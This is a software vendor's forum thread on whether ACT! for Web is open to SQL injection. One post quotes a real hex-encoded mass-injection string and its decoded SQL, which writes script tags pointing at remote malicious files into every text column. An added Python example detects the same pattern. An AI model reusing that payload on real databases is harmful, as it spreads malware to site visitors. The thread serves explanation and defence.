
Is APFW vulnerable to SQL Injection?

Platinum Elite Contributor
Posts: 14,384
Country: Australia

I've asked Sage Australia twice, but haven't had any reply so far.

 

If not sure what I mean, see these:
http://en.wikipedia.org/wiki/Sql_injection
http://ppshein.wordpress.com/tag/dos/ - this explains how it works
http://www.dotnetnuke.com:80/Community/Blogs/tabid/825/EntryID/1930/Default.aspx - This one is from the DNN Core team, basically ensuring that the framework is secure and to check your legacy modules.  It also provided tools to use to check for vulnerabilities and filters.

-----

In short, it’s something like this. They take a legit query string and add their code to it:

Removed link.
253D&tabid=66&mid=376;DECLARE @S CHAR(4000);SET @S=CAST
(0x4445434C415245204054207661726368617228323535292C404320766172636861... AS
CHAR(4000));EXEC(@S);

The hex code translates into this:
 
DECLARE @T varchar(255)'@C varchar(4000) DECLARE Table_Cursor CURSOR
FOR select a.name'b.name from sysobjects a'syscolumns b where
a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=
231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor
INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set
['+@C+']=''"></title><script
src="Removed link.!--''+['+@C+']
where '+@C+' not like ''%"></title><script
src="Removed link.!--''')FETCH NEXT
FROM  Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE
Table_Cursor?
 
The JS scripts they reference in the src= lines are actually viruses. As I have some experience with viruses, I attempted to download the js file to look at it. The file never made it; my gateway antivirus flagged it and killed it each time. So I decided to leave well enough alone.

Message Edited by dlunceford on 10-06-2008 10:21 AM
Message Edited by dlunceford on 10-07-2008 09:59 AM
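
A defender-side check for the request shape quoted in the post above (DECLARE a variable, CAST a hex blob into it, EXEC it), added here as an example and not part of the original thread. The log layout, sample lines and function names are constructed for illustration, and the hex payload is a harmless stand-in.

```python
import re
from urllib.parse import unquote

# DECLARE @v CHAR(n); ... CAST(0x<hex> AS CHAR(n)) ... EXEC(@v), same variable throughout.
STAGED_EXEC = re.compile(
    r"DECLARE\s+@(\w+)\s+N?(?:VAR)?CHAR\(\d+\)\s*;.*?"
    r"CAST\(\s*0x([0-9A-F]+)\s+AS\s+N?(?:VAR)?CHAR\(\d+\)\s*\).*?"
    r"EXEC\s*\(\s*@\1\s*\)",
    re.IGNORECASE | re.DOTALL,
)

def normalise(text, max_rounds=3):
    """Undo percent-encoding, repeating to catch double-encoded requests."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def scan_line(line):
    """Return the staging variable and decoded hex payload, or None if clean."""
    match = STAGED_EXEC.search(normalise(line))
    if not match:
        return None
    hex_blob = match.group(2)
    hex_blob = hex_blob[: len(hex_blob) // 2 * 2]  # tolerate a truncated final nibble
    return {"variable": match.group(1),
            "decoded_sql": bytes.fromhex(hex_blob).decode("latin-1")}

def scan_log(lines):
    """Return (line_number, finding) for every log line carrying the pattern."""
    hits = []
    for number, line in enumerate(lines, start=1):
        finding = scan_line(line)
        if finding:
            hits.append((number, finding))
    return hits

# Constructed sample data: the field layout is an assumption, not a real server log.
BENIGN_HEX = b"SELECT 1".hex().upper()  # harmless stand-in for the hex blob
SAMPLE_LOG = [
    "GET /Default.aspx tabid=66&mid=376 200",
    f"GET /Default.aspx tabid=66&mid=376;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x{BENIGN_HEX}%20AS%20CHAR(4000));EXEC(@S); 200",
    "GET /Search.aspx q=declare+of+independence 200",
]

if __name__ == "__main__":
    for number, finding in scan_log(SAMPLE_LOG):
        print(f"line {number}: @{finding['variable']} -> {finding['decoded_sql']!r}")
```

Decoding the blob at detection time lets an analyst read what the request tried to run without fetching anything it references.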

All Replies
Moderator
Posts: 4,395
Country: USA

Re: Is APFW vulnerable to SQL Injection?

Mike,

 

There are currently no reported SQL injection vulnerabilities with ACT! for Web.  If you were able to encounter any vulnerabilities, please let me know.

Platinum Elite Contributor
Posts: 14,384
Country: Australia

Re: Is APFW vulnerable to SQL Injection?

Unfortunately, while there are actual tests you can do (has Sage actually tested them?), doing this testing is a bit difficult for me ... I only have one APFW license and I can't justify paying for more installing on a test server.

 

I did ask Sage Australia for some licenses to test this with, but they don't respond to my emails.

Tuned Listener
Posts: 17
Country: Australia

Re: Is APFW vulnerable to SQL Injection?

Mike,

 

Who exactly at Sage Australia did you ask these questions?

Solution
Accepted by topic author GLComputing
‎09-25-2015 03:20 AM
Moderator
Posts: 4,395
Country: USA

Re: Is APFW vulnerable to SQL Injection?

Mike,

 

I had a product specialist look into the issue.  He tested with what was available to him with the links you posted along with additional research.

 

Platinum Elite Contributor
Posts: 14,384
Country: Australia

Re: Is APFW vulnerable to SQL Injection?


ACT2112 wrote:

Mike,

 

Who exactly at Sage Australia did you ask these questions?


 

I sent email to Kurt and Ken, twice.

Platinum Elite Contributor
Posts: 14,384
Country: Australia

Re: Is APFW vulnerable to SQL Injection?


dlunceford wrote:

Mike,

 

I had a product specialist look into the issue.  He tested with what was available to him with the links you posted along with additional research.

 


Thanks David

Tuned Listener
Posts: 17
Country: Australia

Re: Is APFW vulnerable to SQL Injection?

Mike,

 

I have checked with Ken; neither one of us received an email regarding this issue from you.

 

Can you tell me when you sent it? Or can you resend it to me?

 

As far as licenses go for testing, you would need to buy them or become an ACC, which would give you 5 licenses for testing purposes.

 

Thanks

Platinum Elite Contributor
Posts: 14,384
Country: Australia

Re: Is APFW vulnerable to SQL Injection?

I sent the email 10:53 on the 25th of Sept and again at 14:05 on the 30th.

 

I assume you're Kurt? You didn't say in your sig and you aren't using a Sage icon as other Sage staff do.

 

As to buying licenses to do testing, if Sage want me to do unpaid testing, they would at least supply the licenses. As it stands, I'll let Sage staff do the testing.

Tuned Listener
Posts: 17
Country: Australia

Re: Is APFW vulnerable to SQL Injection?

Mike,

 

Yes, it's Kurt,

 

I keep every email that I receive from you, and I don't have either one from the dates you mentioned. I also checked Ken's email and they're not in his inbox either.

 

Mike, you make a very strong accusation in your earlier post that we don't respond to your emails.

 

"I did ask Sage Australia for some licenses to test this with, but they don't respond to my emails"

 

Mike, this is a problem for me, as I make sure all of your emails get answered.

 

Please forward these emails to me so I can make sure the problem gets rectified.

 

Thanks,